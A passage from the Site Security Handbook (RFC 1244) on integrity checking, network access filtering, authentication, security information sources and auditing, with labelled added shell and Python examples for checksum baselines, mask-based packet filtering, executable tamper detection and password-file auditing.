function available via USENET as well as the Internet is just
one example of an efficient one-way hash function.) [10]
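
The difference between the mechanisms of sections 3.9.4.1 and 3.9.4.2 shows up when the same baseline-and-verify procedure is run with each of them. The script below is an added example, not part of RFC 1244: the function names are chosen here, the sample file in the test is constructed, SHA-256 stands in for Snefru as the one-way hash, and paths are assumed to contain no tab or newline characters.

```shell
#!/bin/sh
# Added example: three integrity values for a file, and a baseline check.

# Simple checksum: the sum of all bytes modulo 65536.
simple_sum() {
    od -An -v -tu1 "$1" |
    awk '{ for (i = 1; i <= NF; i++) s = (s + $i) % 65536 } END { print s + 0 }'
}

# CRC checksum as computed by the POSIX cksum utility.
crc_sum() { cksum < "$1" | awk '{ print $1 }'; }

# One-way hash. SHA-256 is used here in place of Snefru.
hash_sum() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum < "$1" | awk '{ print $1 }'
    else
        shasum -a 256 < "$1" | awk '{ print $1 }'
    fi
}

# record METHOD FILE...
# Writes one "value<TAB>path" baseline line per file, using METHOD
# (simple_sum, crc_sum or hash_sum).
record() {
    method=$1; shift
    for f in "$@"; do
        printf '%s\t%s\n' "$("$method" "$f")" "$f"
    done
}

# verify METHOD BASELINE
# Recomputes each value and prints "CHANGED path" or "MISSING path";
# prints nothing when every file still matches its recorded value.
verify() {
    while IFS="$(printf '\t')" read -r want path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"
        elif [ "$("$1" "$path")" != "$want" ]; then
            echo "CHANGED $path"
        fi
    done < "$2"
}

# Usage: integrity.sh record hash_sum FILE... > baseline   (store off-line)
#        integrity.sh verify hash_sum baseline
case "${1:-}" in
    record|verify) "$@" ;;
esac
```

A file whose bytes are merely rearranged keeps the same simple checksum, so a baseline recorded with simple_sum reports nothing, while the crc_sum and hash_sum baselines report the file as changed.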

3.9.5 Limiting Network Access

The dominant network protocols in use on the Internet, IP (RFC
791) [11], TCP (RFC 793) [12], and UDP (RFC 768) [13], carry
certain control information which can be used to restrict access
to certain hosts or networks within an organization.

The IP packet header contains the network addresses of both the
sender and recipient of the packet. Further, the TCP and UDP
protocols provide the notion of a “port”, which identifies the
endpoint (usually a network server) of a communications path. In
some instances, it may be desirable to deny access to a specific
TCP or UDP port, or even to certain hosts and networks altogether.

3.9.5.1 Gateway Routing Tables

One of the simplest approaches to preventing unwanted network
connections is to simply remove certain networks from a
gateway’s routing tables. This makes it “impossible” for a
host to send packets to these networks. (Most protocols
require bidirectional packet flow even for unidirectional data
flow, thus breaking one side of the route is usually
sufficient.)

This approach is commonly taken in “firewall” systems by
preventing the firewall from advertising local routes to the
outside world. The approach is deficient in that it often
prevents “too much” (e.g., in order to prevent access to one
system on the network, access to all systems on the network is
disabled).

3.9.5.2 Router Packet Filtering

Many commercially available gateway systems (more correctly
called routers) provide the ability to filter packets based not
only on sources or destinations, but also on source-destination
combinations. This mechanism can be used to deny access to a
specific host, network, or subnet from any other host, network,
or subnet.

Gateway systems from some vendors (e.g., cisco Systems) support
an even more complex scheme, allowing finer control over source
and destination addresses. Via the use of address masks, one
can deny access to all but one host on a particular network.
The cisco Systems gateways also allow packet screening based on IP
protocol type and TCP or UDP port numbers [14].

This can also be circumvented by “source routing” packets
destined for the “secret” network. Source routed packets may
be filtered out by gateways, but this may restrict other
legitimate activities, such as diagnosing routing problems.
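
How source-destination filtering with address masks reaches a decision, as an added example that is not part of RFC 1244 and does not use any vendor's rule syntax. The rule format, the function names and the rule set are constructed for illustration; the assumptions are that a mask bit of 1 means the bit must match, that the first matching rule wins, and that a packet matching no rule is denied.

```shell
#!/bin/sh
# Added example: first-match packet filter with address masks.

# ip_to_int A.B.C.D -> the address as a 32-bit integer
ip_to_int() {
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# masked_match ADDR RULE_ADDR MASK
# True when ADDR equals RULE_ADDR on every bit that is set in MASK.
masked_match() {
    a=$(ip_to_int "$1"); r=$(ip_to_int "$2"); m=$(ip_to_int "$3")
    [ $(( a & m )) -eq $(( r & m )) ]
}

# filter_decision RULES_FILE SRC DST -> prints "permit" or "deny"
# Each rule line: action source src-mask destination dst-mask
filter_decision() {
    while read -r action rsrc smask rdst dmask; do
        case $action in ''|'#'*) continue ;; esac
        if masked_match "$2" "$rsrc" "$smask" &&
           masked_match "$3" "$rdst" "$dmask"; then
            echo "$action"
            return 0
        fi
    done < "$1"
    echo deny
}

# Constructed rule set: outside hosts may reach only 192.0.2.10 on the
# 192.0.2.0 network, and one outside network may not reach even that host.
sample_rules() {
cat <<'EOF'
# action  source        src-mask        destination   dst-mask
deny      198.51.100.0  255.255.255.0   192.0.2.10    255.255.255.255
permit    0.0.0.0       0.0.0.0         192.0.2.10    255.255.255.255
deny      0.0.0.0       0.0.0.0         192.0.2.0     255.255.255.0
permit    0.0.0.0       0.0.0.0         0.0.0.0       0.0.0.0
EOF
}

# Usage: filter.sh RULES_FILE SRC DST
if [ "$#" -eq 3 ]; then
    filter_decision "$@"
fi
```

Unlike removing a network from the routing table, the third rule blocks the rest of the network while the second still lets the one permitted host be reached.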

3.9.6 Authentication Systems

Authentication refers to the process of proving a claimed identity
to the satisfaction of some permission-granting authority.
Authentication systems are hardware, software, or procedural
mechanisms that enable a user to obtain access to computing
resources. At the simplest level, the system administrator who
adds new user accounts to the system is part of the system
authentication mechanism. At the other end of the spectrum,
fingerprint readers or retinal scanners provide a very high-tech
solution to establishing a potential user’s identity. Without
establishing and proving a user’s identity prior to establishing a
session, your site’s computers are vulnerable to any sort of
attack.

Typically, a user authenticates himself or herself to the system
by entering a password in response to a prompt.
Challenge/Response mechanisms improve upon passwords by prompting
the user for some piece of information shared by both the computer
and the user (such as mother’s maiden name, etc.).

3.9.6.1 Kerberos

Kerberos, named after the dog who in mythology is said to stand
at the gates of Hades, is a collection of software used in a
large network to establish a user’s claimed identity.
Developed at the Massachusetts Institute of Technology (MIT),
it uses a combination of encryption and distributed databases
so that a user at a campus facility can login and start a
session from any computer located on the campus. This has
clear advantages in certain environments where there are a
large number of potential users who may establish a connection
from any one of a large number of workstations. Some vendors
are now incorporating Kerberos into their systems.

It should be noted that while Kerberos makes several advances
in the area of authentication, some security weaknesses in the
protocol still remain [15].

3.9.6.2 Smart Cards

Several systems use “smart cards” (a small calculator-like
device) to help authenticate users. These systems depend on
the user having an object in their possession. One such system
involves a new password procedure that requires a user to enter
a value obtained from a “smart card” when asked for a password
by the computer. Typically, the host machine will give the
user some piece of information that is entered into the
keyboard of the smart card. The smart card will display a
response which must then be entered into the computer before
the session will be established. Another such system involves
a smart card which displays a number which changes over time,
but which is synchronized with the authentication software on
the computer.

This is a better way of dealing with authentication than with
the traditional password approach. On the other hand, some say
it’s inconvenient to carry the smart card. Start-up costs are
likely to be high as well.

3.9.7 Books, Lists, and Informational Sources

There are many good sources for information regarding computer
security. The annotated bibliography at the end of this document
can provide you with a good start. In addition, information can
be obtained from a variety of other sources, some of which are
described in this section.

3.9.7.1 Security Mailing Lists

The UNIX Security mailing list exists to notify system
administrators of security problems before they become common
knowledge, and to provide security enhancement information. It
is a restricted-access list, open only to people who can be
verified as being principal systems people at a site. Requests
to join the list must be sent by either the site contact listed
in the Defense Data Network’s Network Information Center’s (DDN
NIC) WHOIS database, or from the “root” account on one of the
major site machines. You must include the destination address
you want on the list, an indication of whether you want to be
on the mail reflector list or receive weekly digests, the
electronic mail address and voice telephone number of the site
contact if it isn’t you, and the name, address, and telephone
number of your organization. This information should be sent
to SECURITY-REQUEST@CPD.COM.

The RISKS digest is a component of the ACM Committee on
Computers and Public Policy, moderated by Peter G. Neumann. It
is a discussion forum on risks to the public in computers and
related systems, and along with discussing computer security
and privacy issues, has discussed such subjects as the Stark
incident, the shooting down of the Iranian airliner in the
Persian Gulf (as it relates to the computerized weapons
systems), problems in air and railroad traffic control systems,
software engineering, and so on. To join the mailing list,
send a message to RISKS-REQUEST@CSL.SRI.COM. This list is also
available in the USENET newsgroup “comp.risks”.

The VIRUS-L list is a forum for the discussion of computer
virus experiences, protection software, and related topics.
The list is open to the public, and is implemented as a
moderated digest. Most of the information is related to
personal computers, although some of it may be applicable to
larger systems. To subscribe, send the line:

SUB VIRUS-L your full name

to the address LISTSERV%LEHIIBM1.BITNET@MITVMA.MIT.EDU. This
list is also available via the USENET newsgroup “comp.virus”.

The Computer Underground Digest “is an open forum dedicated to
sharing information among computerists and to the presentation
and debate of diverse views.” While not directly a security
list, it does contain discussions about privacy and other
security related topics. The list can be read on USENET as
alt.society.cu-digest, or to join the mailing list, send mail
to Gordon Myer (TK0JUT2%NIU.bitnet@mitvma.mit.edu).
Submissions may be mailed to: cud@chinacat.unicom.com.

3.9.7.2 Networking Mailing Lists

The TCP-IP mailing list is intended to act as a discussion
forum for developers and maintainers of implementations of the
TCP/IP protocol suite. It also discusses network-related
security problems when they involve programs providing network
services, such as “Sendmail”. To join the TCP-IP list, send a
message to TCP-IP-REQUEST@NISC.SRI.COM. This list is also
available in the USENET newsgroup “comp.protocols.tcp-ip”.

SUN-NETS is a discussion list for items pertaining to
networking on Sun systems. Much of the discussion is related
to NFS, NIS (formerly Yellow Pages), and name servers. To
subscribe, send a message to SUN-NETS-REQUEST@UMIACS.UMD.EDU.

The USENET groups misc.security and alt.security also discuss
security issues. misc.security is a moderated group and also
includes discussions of physical security and locks.
alt.security is unmoderated.

3.9.7.3 Response Teams

Several organizations have formed special groups of people to
deal with computer security problems. These teams collect
information about possible security holes and disseminate it to
the proper people, track intruders, and assist in recovery from
security violations. The teams typically have both electronic
mail distribution lists as well as a special telephone number
which can be called for information or to report a problem.
Many of these teams are members of the CERT System, which is
coordinated by the National Institute of Standards and
Technology (NIST), and exists to facilitate the exchange of
information between the various teams.

3.9.7.3.1 DARPA Computer Emergency Response Team

The Computer Emergency Response Team/Coordination Center
(CERT/CC) was established in December 1988 by the Defense
Advanced Research Projects Agency (DARPA) to address
computer security concerns of research users of the
Internet. It is operated by the Software Engineering
Institute (SEI) at Carnegie-Mellon University (CMU). The
CERT can immediately confer with experts to diagnose and
solve security problems, and also establish and maintain
communications with the affected computer users and
government authorities as appropriate.

The CERT/CC serves as a clearing house for the
identification and repair of security vulnerabilities,
informal assessments of existing systems, improvement of
emergency response capability, and both vendor and user
security awareness. In addition, the team works with
vendors of various systems in order to coordinate the fixes
for security problems.

The CERT/CC sends out security advisories to the CERT-
ADVISORY mailing list whenever appropriate. They also
operate a 24-hour hotline that can be called to report
security problems (e.g., someone breaking into your system),
as well as to obtain current (and accurate) information
about rumored security problems.

To join the CERT-ADVISORY mailing list, send a message to
CERT@CERT.SEI.CMU.EDU and ask to be added to the mailing
list. The material sent to this list also appears in the
USENET newsgroup “comp.security.announce”. Past advisories
are available for anonymous FTP from the host
CERT.SEI.CMU.EDU. The 24-hour hotline number is (412) 268-
7090.

The CERT/CC also maintains a CERT-TOOLS list to encourage
the exchange of information on tools and techniques that
increase the secure operation of Internet systems. The
CERT/CC does not review or endorse the tools described on
the list. To subscribe, send a message to CERT-TOOLS-
REQUEST@CERT.SEI.CMU.EDU and ask to be added to the mailing
list.

The CERT/CC maintains other generally useful security
information for anonymous FTP from CERT.SEI.CMU.EDU. Get
the README file for a list of what is available.

For more information, contact:

CERT
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, PA 15213-3890

(412) 268-7090
cert@cert.sei.cmu.edu.

3.9.7.3.2 DDN Security Coordination Center

For DDN users, the Security Coordination Center (SCC) serves
a function similar to CERT. The SCC is the DDN’s clearing-
house for host/user security problems and fixes, and works
with the DDN Network Security Officer. The SCC also
distributes the DDN Security Bulletin, which communicates
information on network and host security exposures, fixes,
and concerns to security and management personnel at DDN
facilities. It is available online, via kermit or anonymous
FTP, from the host NIC.DDN.MIL, in SCC:DDN-SECURITY-yy-
nn.TXT (where “yy” is the year and “nn” is the bulletin
number). The SCC provides immediate assistance with DDN-
related host security problems; call (800) 235-3155 (6:00
a.m. to 5:00 p.m. Pacific Time) or send email to
SCC@NIC.DDN.MIL. For 24 hour coverage, call the MILNET
Trouble Desk (800) 451-7413 or AUTOVON 231-1713.

3.9.7.3.3 NIST Computer Security Resource and Response Center

The National Institute of Standards and Technology (NIST)
has responsibility within the U.S. Federal Government for
computer science and technology activities. NIST has played
a strong role in organizing the CERT System and is now
serving as the CERT System Secretariat. NIST also operates
a Computer Security Resource and Response Center (CSRC) to
provide help and information regarding computer security
events and incidents, as well as to raise awareness about
computer security vulnerabilities.

The CSRC team operates a 24-hour hotline, at (301) 975-5200.
For individuals with access to the Internet, on-line
publications and computer security information can be
obtained via anonymous FTP from the host CSRC.NCSL.NIST.GOV
(129.6.48.87). NIST also operates a personal computer
bulletin board that contains information regarding computer
viruses as well as other aspects of computer security. To
access this board, set your modem to 300/1200/2400 BPS, 1
stop bit, no parity, and 8-bit characters, and call (301)
948-5717. All users are given full access to the board
immediately upon registering.

NIST has produced several special publications related to
computer security and computer viruses in particular; some
of these publications are downloadable. For further
information, contact NIST at the following address:

Computer Security Resource and Response Center
A-216 Technology
Gaithersburg, MD 20899
Telephone: (301) 975-3359
Electronic Mail: CSRC@nist.gov

3.9.7.3.4 DOE Computer Incident Advisory Capability (CIAC)

CIAC is the Department of Energy’s (DOE’s) Computer Incident
Advisory Capability. CIAC is a four-person team of computer
scientists from Lawrence Livermore National Laboratory
(LLNL) charged with the primary responsibility of assisting
DOE sites faced with computer security incidents (e.g.,
intruder attacks, virus infections, worm attacks, etc.).
This capability is available to DOE sites on a 24-hour-a-day
basis.

CIAC was formed to provide a centralized response capability
(including technical assistance), to keep sites informed of
current events, to deal proactively with computer security
issues, and to maintain liaisons with other response teams
and agencies. CIAC’s charter is to assist sites (through
direct technical assistance, providing information, or
referring inquiries to other technical experts), serve as a
clearinghouse for information about threats/known
incidents/vulnerabilities, develop guidelines for incident
handling, develop software for responding to
events/incidents, analyze events and trends, conduct
training and awareness activities, and alert and advise
sites about vulnerabilities and potential attacks.

CIAC’s business hours phone number is (415) 422-8193 or FTS
532-8193. CIAC’s e-mail address is CIAC@TIGER.LLNL.GOV.

3.9.7.3.5 NASA Ames Computer Network Security Response Team

The Computer Network Security Response Team (CNSRT) is NASA
Ames Research Center’s local version of the DARPA CERT.
Formed in August of 1989, the team has a constituency that
is primarily Ames users, but it is also involved in
assisting other NASA Centers and federal agencies. CNSRT
maintains liaisons with the DOE’s CIAC team and the DARPA
CERT. It is also a charter member of the CERT System. The
team may be reached by 24 hour pager at (415) 694-0571, or
by electronic mail to CNSRT@AMES.ARC.NASA.GOV.

3.9.7.4 DDN Management Bulletins

The DDN Management Bulletin is distributed electronically by
the DDN NIC under contract to the Defense Communications Agency
(DCA). It is a means of communicating official policy,
procedures, and other information of concern to management
personnel at DDN facilities.

The DDN Security Bulletin is distributed electronically by the
DDN SCC, also under contract to DCA, as a means of
communicating information on network and host security
exposures, fixes, and concerns to security and management
personnel at DDN facilities.

Anyone may join the mailing lists for these two bulletins by
sending a message to NIC@NIC.DDN.MIL and asking to be placed on
the mailing lists. These messages are also posted to the
USENET newsgroup “ddn.mgt-bulletin”. For additional
information, see section 8.7.

3.9.7.5 System Administration List

The SYSADM-LIST is a list pertaining exclusively to UNIX system
administration. Mail requests to be added to the list to
SYSADM-LIST-REQUEST@SYSADMIN.COM.

3.9.7.6 Vendor Specific System Lists

The SUN-SPOTS and SUN-MANAGERS lists are discussion groups for
users and administrators of systems supplied by Sun
Microsystems. SUN-SPOTS is a fairly general list, discussing
everything from hardware configurations to simple UNIX
questions. To subscribe, send a message to SUN-SPOTS-
REQUEST@RICE.EDU. This list is also available in the USENET
newsgroup “comp.sys.sun”. SUN-MANAGERS is a discussion list
for Sun system administrators and covers all aspects of Sun
system administration. To subscribe, send a message to SUN-
MANAGERS-REQUEST@EECS.NWU.EDU.

The APOLLO list discusses the HP/Apollo system and its
software. To subscribe, send a message to APOLLO-
REQUEST@UMIX.CC.UMICH.EDU. APOLLO-L is a similar list which
can be subscribed to by sending

SUB APOLLO-L your full name

to LISTSERV%UMRVMB.BITNET@VM1.NODAK.EDU.

HPMINI-L pertains to the Hewlett-Packard 9000 series and HP/UX
operating system. To subscribe, send

SUB HPMINI-L your full name

to LISTSERV%UAFSYSB.BITNET@VM1.NODAK.EDU.

INFO-IBMPC discusses IBM PCs and compatibles, as well as MS-
DOS. To subscribe, send a note to INFO-IBMPC-REQUEST@WSMR-
SIMTEL20.ARMY.MIL.

There are numerous other mailing lists for nearly every popular
computer or workstation in use today. For a complete list,
obtain the file “netinfo/interest-groups” via anonymous FTP
from the host FTP.NISC.SRI.COM.

3.9.7.7 Professional Societies and Journals

The IEEE Technical Committee on Security & Privacy publishes a
quarterly magazine, “CIPHER”.

IEEE Computer Society,
1730 Massachusetts Ave. N.W.
Washington, DC 2036-1903

The ACM SigSAC (Special Interest Group on Security, Audit, and
Controls) publishes a quarterly magazine, “SIGSAC Review”.

Association for Computing Machinery
11 West 42nd St.
New York, N.Y. 10036

The Information Systems Security Association publishes a
quarterly magazine called “ISSA Access”.

Information Systems Security Association
P.O. Box 9457
Newport Beach, CA 92658

“Computers and Security” is an “international journal for the
professional involved with computer security, audit and
control, and data integrity.”

$266/year, 8 issues (1990)

Elsevier Advanced Technology
Journal Information Center
655 Avenue of the Americas
New York, NY 10010

The “Data Security Letter” is published “to help data security
professionals by providing inside information and knowledgeable
analysis of developments in computer and communications
security.”

$690/year, 9 issues (1990)

Data Security Letter
P.O. Box 1593
Palo Alto, CA 94302

3.9.8 Problem Reporting Tools

3.9.8.1 Auditing

Auditing is an important tool that can be used to enhance the
security of your installation. Not only does it give you a
means of identifying who has accessed your system (and may have
done something to it) but it also gives you an indication of
how your system is being used (or abused) by authorized users
and attackers alike. In addition, the audit trail
traditionally kept by computer systems can become an invaluable
piece of evidence should your system be penetrated.

3.9.8.1.1 Verify Security

An audit trail shows how the system is being used from day
to day. Depending upon how your site audit log is
configured, your log files should show a range of access
attempts that can show what normal system usage should look
like. Deviation from that normal usage could be the result
of penetration from an outside source using an old or stale
user account. Observing a deviation in logins, for example,
could be your first indication that something unusual is
happening.

3.9.8.1.2 Verify Software Configurations

One of the ruses used by attackers to gain access to a
system is the insertion of a so-called Trojan Horse
program. A Trojan Horse program can be a program that does
something useful, or merely something interesting. It
always does something unexpected, like steal passwords or
copy files without your knowledge [25]. Imagine a Trojan
login program that prompts for username and password in the
usual way, but also writes that information to a special
file that the attacker can come back and read at will.
Imagine a Trojan Editor program that, despite the file
permissions you have given your files, makes copies of
everything in your directory space without you knowing about
it.

This points out the need for configuration management of the
software that runs on a system, not as it is being
developed, but as it is in actual operation. Techniques for
doing this range from checking each command every time it is
executed against some criterion (such as a cryptoseal,
described above) to merely checking the date and time stamp
of the executable. Another technique might be to check each
command in batch mode at midnight.
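
The batch check described above, as an added example (not part of RFC 1244 or of any tool it names): it records a SHA-256 digest and the permission bits of each file, then compares a later snapshot against that record, with a size-and-timestamp comparison run alongside to show what the weaker check misses. SHA-256 stands in for the "cryptoseal"; the directory, file names and contents are constructed in a temporary directory.

```python
import hashlib
import os
import stat
import tempfile


def fingerprint(path):
    """Record what a nightly batch check would store for one executable."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    st = os.stat(path)
    return {
        "sha256": digest.hexdigest(),
        "mode": stat.S_IMODE(st.st_mode),
        "size": st.st_size,
        "mtime_ns": st.st_mtime_ns,
    }


def snapshot(directory):
    """Fingerprint every regular file under `directory` (symlinks skipped)."""
    result = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if os.path.isfile(path) and not os.path.islink(path):
                result[path] = fingerprint(path)
    return result


def compare(baseline, current, fields):
    """Return (kind, path) findings, comparing only the given fields."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        old, new = baseline.get(path), current.get(path)
        if old is None:
            findings.append(("ADDED", path))
        elif new is None:
            findings.append(("REMOVED", path))
        else:
            for field in fields:
                if old[field] != new[field]:
                    findings.append((field.upper(), path))
    return findings


TIMESTAMP_CHECK = ("size", "mtime_ns")   # the "date and time stamp" check
SEAL_CHECK = ("sha256", "mode")          # digest plus permission bits


def demo():
    """Constructed scenario; returns the findings of both checks."""
    with tempfile.TemporaryDirectory() as bindir:
        login = os.path.join(bindir, "login")
        editor = os.path.join(bindir, "editor")
        for path, body in ((login, b"original login v1\n"), (editor, b"editor\n")):
            with open(path, "wb") as fh:
                fh.write(body)
            os.chmod(path, 0o755)
        baseline = snapshot(bindir)

        # Constructed change 1: same-length replacement with the old timestamps.
        st = os.stat(login)
        with open(login, "wb") as fh:
            fh.write(b"replaced login v1\n")
        os.utime(login, ns=(st.st_atime_ns, st.st_mtime_ns))
        # Constructed change 2: permission bits loosened, unexpected file added.
        os.chmod(editor, 0o777)
        with open(os.path.join(bindir, "extra"), "wb") as fh:
            fh.write(b"unexpected\n")

        current = snapshot(bindir)
        strip = lambda fs: [(kind, os.path.basename(p)) for kind, p in fs]
        return {
            "timestamp": strip(compare(baseline, current, TIMESTAMP_CHECK)),
            "seal": strip(compare(baseline, current, SEAL_CHECK)),
        }


if __name__ == "__main__":
    for check, findings in demo().items():
        print(check, findings)
```

The baseline itself has to be stored where the audited system cannot rewrite it, otherwise the comparison proves nothing.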

3.9.8.2 Tools

COPS is a security tool for system administrators that checks
for numerous common security problems on UNIX systems [27].
COPS is a collection of shell scripts and C programs that can
easily be run on almost any UNIX variant. Among other things,
it checks the following items and sends the results to the
system administrator:

– Checks “/dev/kmem” and other devices for world
read/writability.

– Checks special or important files and directories for
“bad” modes (world writable, etc.).

– Checks for easily-guessed passwords.

– Checks for duplicate user ids, invalid fields in the
password file, etc..

– Checks for duplicate group ids, invalid fields in the
group file, etc..

– Checks all users’ home directories and their “.cshrc”,
“.login”, “.profile”, and “.rhosts” files for security
problems.

– Checks all commands in the “/etc/rc” files and “cron”
files for world writability.

– Checks for bad “root” paths, NFS file systems exported
to the world, etc..

– Includes an expert system that checks to see if a given
user (usually “root”) can be compromised, given that
certain rules are true.

– Checks for changes in the setuid status of programs on the
system.

The COPS package is available from the “comp.sources.unix”
archive on “ftp.uu.net”, and also from the UNIX-SW repository
on the MILNET host “wsmr-simtel20.army.mil”.
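
Two of the checks in the list above, duplicate user ids and invalid fields in the password file, written out as an added example. This is not COPS code; the function name and the sample entries are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in passwd(5) layout: name:passwd:uid:gid:gecos:home:shell
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1001:1001:Alice:/home/alice:/bin/sh
bob:x:1001:1002:Bob:/home/bob:/bin/sh
toor:x:0:0:spare admin:/root:/bin/sh
carol::1003:1003:Carol:/home/carol:/bin/sh
dave:x:abc:1004:Dave:/home/dave:/bin/sh
erin:x:1005:1005:Erin:/home/erin
alice:x:1006:1006:Second Alice:/home/alice2:/bin/sh
"""

NUMERIC = re.compile(r"[0-9]+")


def audit_passwd(text):
    """Return sorted (line_number, account, problem) tuples for a passwd file."""
    findings = []
    by_uid = defaultdict(list)   # uid -> [(line_number, name), ...]
    first_seen = {}              # name -> line number of first use
    for lineno, line in enumerate(text.splitlines(), start=1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(
                (lineno, fields[0], "expected 7 fields, found %d" % len(fields)))
            continue
        name, passwd, uid, gid, _gecos, home, _shell = fields
        if not name:
            findings.append((lineno, name, "empty login name"))
        elif name in first_seen:
            findings.append(
                (lineno, name, "login name already used on line %d" % first_seen[name]))
        else:
            first_seen[name] = lineno
        if passwd == "":
            # An empty second field means the account needs no password.
            findings.append((lineno, name, "empty password field"))
        if NUMERIC.fullmatch(uid):
            by_uid[int(uid)].append((lineno, name))
        else:
            findings.append((lineno, name, "non-numeric uid %r" % uid))
        if not NUMERIC.fullmatch(gid):
            findings.append((lineno, name, "non-numeric gid %r" % gid))
        if not home.startswith("/"):
            findings.append((lineno, name, "home directory is not an absolute path"))
    # Report every account after the first that reuses a uid; a second
    # uid 0 entry is a second superuser account.
    for uid, users in by_uid.items():
        if len(users) > 1:
            names = ", ".join(n for _lineno, n in users)
            for lineno, name in users[1:]:
                findings.append((lineno, name, "uid %d shared by %s" % (uid, names)))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, name, problem in audit_passwd(SAMPLE_PASSWD):
        print("line %d (%s): %s" % (lineno, name, problem))
```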

3.9.9 Communication Among Administrators

3.9.9.1 Secure Operating Systems

The following list of products and vendors is adapted from the
National Computer Security Center’s (NCSC) Evaluated Products
List. They represent those companies who have either received
an evaluation from the NCSC or are in the process of a product
evaluation. This list is not complete, but it is
representative of those operating systems and add on components
available in the commercial marketplace.

For a more detailed listing of the current products appearing
in the NCSC EPL, contact the NCSC at:

National Computer Security Center
9800 Savage Road
Fort George G. Meade, MD 20755-6000
(301) 859-4458

                                                          Version       Evaluation
Evaluated Product             Vendor                      Evaluated     Class
----------------------------------------------------------------------------------
Secure Communications         Honeywell Information       2.1           A1
Processor (SCOMP)             Systems, Inc.

Multics                       Honeywell Information       MR11.0        B2
                              Systems, Inc.

System V/MLS 1.1.2 on UNIX    AT&T                        1.1.2         B1
System V 3.1.1 on AT&T
3B2/500 and 3B2/600

OS 1100                       Unisys Corp.                Security      B1
                                                          Release 1

MPE V/E                       Hewlett-Packard Computer    G.03.04       C2
                              Systems Division

AOS/VS on MV/ECLIPSE series   Data General Corp.          7.60          C2

VM/SP or VM/SP HPO with CMS,  IBM Corp.                   5             C2
RACF, DIRMAINT, VMTAPE-MS,
ISPF

MVS/XA with RACF              IBM Corp.                   2.2,2.3       C2

VAX/VMS                       Digital Equipment Corp.     4.3           C2

NOS                           Control Data Corp.          NOS           C2
                                                          Security
                                                          Eval Product

TOP SECRET                    CGA Software Products       3.0/163       C2
                              Group, Inc.

Access Control Facility 2     SKK, Inc.                   3.1.3         C2

UTX/32S                       Gould, Inc. Computer        1.0           C2
                              Systems Division

A Series MCP/AS with          Unisys Corp.                3.7           C2
InfoGuard Security
Enhancements

Primos                        Prime Computer, Inc.        21.0.1DODC2A  C2

Resource Access Control       IBM Corp.                   1.5           C1
Facility (RACF)

                                                          Version       Candidate
Candidate Product             Vendor                      Evaluated     Class
----------------------------------------------------------------------------------
Boeing MLS LAN                Boeing Aerospace                          A1 M1

Trusted XENIX                 Trusted Information                       B2
                              Systems, Inc.

VSLAN                         VERDIX Corp.                              B2

System V/MLS                  AT&T                                      B1

VM/SP with RACF               IBM Corp.                   5/1.8.2       C2

Wang SVS/OS with CAP          Wang Laboratories, Inc.     1.0           C2

3.9.9.2 Obtaining Fixes for Known Problems

It goes without saying that computer systems have bugs. Even
operating systems, upon which we depend for protection of our
data, have bugs. And since there are bugs, things can be
broken, both maliciously and accidentally. It is important
that whenever bugs are discovered, a fix should be identified
and implemented as soon as possible. This should minimize any
exposure caused by the bug in the first place.

A corollary to the bug problem is: from whom do I obtain the
fixes? Most systems have some support from the manufacturer or
supplier. Fixes coming from that source tend to be implemented
quickly after receipt. Fixes for some problems are often
posted on the network and are left to the system administrators
to incorporate as they can. The problem is that one wants to
have faith that the fix will close the hole and not introduce
any others. We will tend to trust that the manufacturer’s
fixes are better than those that are posted on the net.

3.9.9.3 Sun Customer Warning System

Sun Microsystems has established a Customer Warning System
(CWS) for handling security incidents. This is a formal
process which includes:

– Having a well advertised point of contact in Sun
for reporting security problems.
– Pro-actively alerting customers of worms, viruses,
or other security holes that could affect their systems.
– Distributing the patch (or work-around) as quickly
as possible.

They have created an electronic mail address, SECURITY-
ALERT@SUN.COM, which will enable customers to report security
problems. A voice-mail backup is available at (415) 688-9081.
A “Security Contact” can be designated by each customer site;
this person will be contacted by Sun in case of any new
security problems. For more information, contact your Sun
representative.

3.9.9.4 Trusted Archive Servers

Several sites on the Internet maintain large repositories of
public-domain and freely distributable software, and make this
material available for anonymous FTP. This section describes
some of the larger repositories. Note that none of these
servers implements secure checksums or anything else
guaranteeing the integrity of their data. Thus, the notion of
“trust” should be taken as a somewhat limited definition.

3.9.9.4.1 Sun Fixes on UUNET

Sun Microsystems has contracted with UUNET Communications
Services, Inc., to make fixes for bugs in Sun software
available via anonymous FTP. You can access these fixes by
using the “ftp” command to connect to the host FTP.UU.NET.
Then change into the directory “sun-dist/security”, and
obtain a directory listing. The file “README” contains a
brief description of what each file in this directory
contains, and what is required to install the fix.

3.9.9.4.2 Berkeley Fixes

The University of California at Berkeley also makes fixes
available via anonymous FTP; these fixes pertain primarily
to the current release of BSD UNIX (currently, release 4.3).
However, even if you are not running their software, these
fixes are still important, since many vendors (Sun, DEC,
Sequent, etc.) base their software on the Berkeley releases.

The Berkeley fixes are available for anonymous FTP from the
host UCBARPA.BERKELEY.EDU in the directory “4.3/ucb-fixes”.
The file “INDEX” in this directory describes what each file
contains. They are also available from UUNET (see section
3.9.9.4.3).

Berkeley also distributes new versions of “sendmail” and
“named” from this machine. New versions of these commands
are stored in the “4.3” directory, usually in the files
“sendmail.tar.Z” and “bind.tar.Z”, respectively.

3.9.9.4.3 Simtel-20 and UUNET

The two largest general-purpose software repositories on the
Internet are the hosts WSMR-SIMTEL20.ARMY.MIL and
FTP.UU.NET.

WSMR-SIMTEL20.ARMY.MIL is a TOPS-20 machine operated by the
U.S. Army at White Sands Missile Range (WSMR), New Mexico.
The directory “pd2:” contains a large amount of UNIX
software, primarily taken from the “comp.sources”
newsgroups. The directories “pd1:” and
“pd2:” contain software for IBM PC systems, and
“pd3:” contains software for the Apple Macintosh.

FTP.UU.NET is operated by UUNET Communications Services,
Inc. in Falls Church, Virginia. This company sells Internet
and USENET access to sites all over the country (and
